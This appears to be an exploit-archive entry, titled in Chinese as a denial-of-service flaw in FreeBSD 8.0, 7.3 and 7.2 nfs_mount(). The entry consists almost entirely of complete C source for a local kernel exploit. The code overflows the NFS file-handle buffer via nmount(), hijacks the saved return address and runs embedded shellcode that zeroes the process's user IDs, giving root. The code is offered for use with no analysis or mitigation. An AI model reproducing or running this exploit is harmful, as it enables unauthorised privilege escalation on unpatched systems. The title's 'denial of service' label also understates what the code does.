FreeBSD 8.0, 7.3 and 7.2 nfs_mount() 拒绝服务漏洞

Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2 #include <sys/param.h> #include <sys/mount.h> #include <sys/uio.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sysexits.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <errno.h> #include <nfsclient/nfsargs.h> #define BUFSIZE 272 #define FSNAME "nfs" #define DIRPATH "/tmp/nfs" unsigned char kernelcode[] = "\x64\xa1\x00\x00\x00\x00" /* movl %fs:0, %eax */ "\x8b\x40\x04" /* movl 0x4(%eax), %eax */ "\x8b\x40\x30" /* movl 0x30(%eax),%eax */ "\x31\xc9" /* xorl %ecx, %ecx */ "\x89\x48\x04" /* movl %ecx, 0x4(%eax) */ "\x89\x48\x08" /* movl %ecx, 0x8(%eax) */ "\x81\xc4\xb0\x01\x00\x00" /* addl $0x1b0, %esp */ "\x5b" /* popl %ebx */ "\x5e" /* popl %esi */ "\x5f" /* popl %edi */ "\x5d" /* popl %ebp */ "\xc3"; /* ret */ int main() { char *ptr; long *lptr; struct nfs_args na; struct iovec iov[6]; na.version = 3; na.fh = calloc(BUFSIZE, sizeof(char)); if(na.fh == NULL) { perror("calloc"); exit(1); } memset(na.fh, 0x41, BUFSIZE); na.fhsize = BUFSIZE; ptr = (char *)na.fh; lptr = (long *)(na.fh + BUFSIZE - 8); *lptr++ = 0x12345678; /* saved %ebp */ *lptr++ = (u_long)ptr; /* saved %eip */ memcpy(ptr, kernelcode, (sizeof(kernelcode) - 1)); mkdir(DIRPATH, 0700); iov[0].iov_base = "fstype"; iov[0].iov_len = strlen(iov[0].iov_base) + 1; iov[1].iov_base = FSNAME; iov[1].iov_len = strlen(iov[1].iov_base) + 1; iov[2].iov_base = "fspath"; iov[2].iov_len = strlen(iov[2].iov_base) + 1; iov[3].iov_base = DIRPATH; iov[3].iov_len = strlen(iov[3].iov_base) + 1; iov[4].iov_base = "nfs_args"; iov[4].iov_len = strlen(iov[4].iov_base) + 1; iov[5].iov_base = &na; iov[5].iov_len = sizeof(na); printf("[*] calling nmount()\n"); if(nmount(iov, 6, 0) < 0) { fprintf(stderr, "[!] nmount error: %d\n", errno); perror("nmount"); rmdir(DIRPATH); free(na.fh); exit(1); } printf("[*] unmounting and deleting %s\n", DIRPATH); unmount(DIRPATH, 0); rmdir(DIRPATH); free(na.fh); return 0; } /* EOF */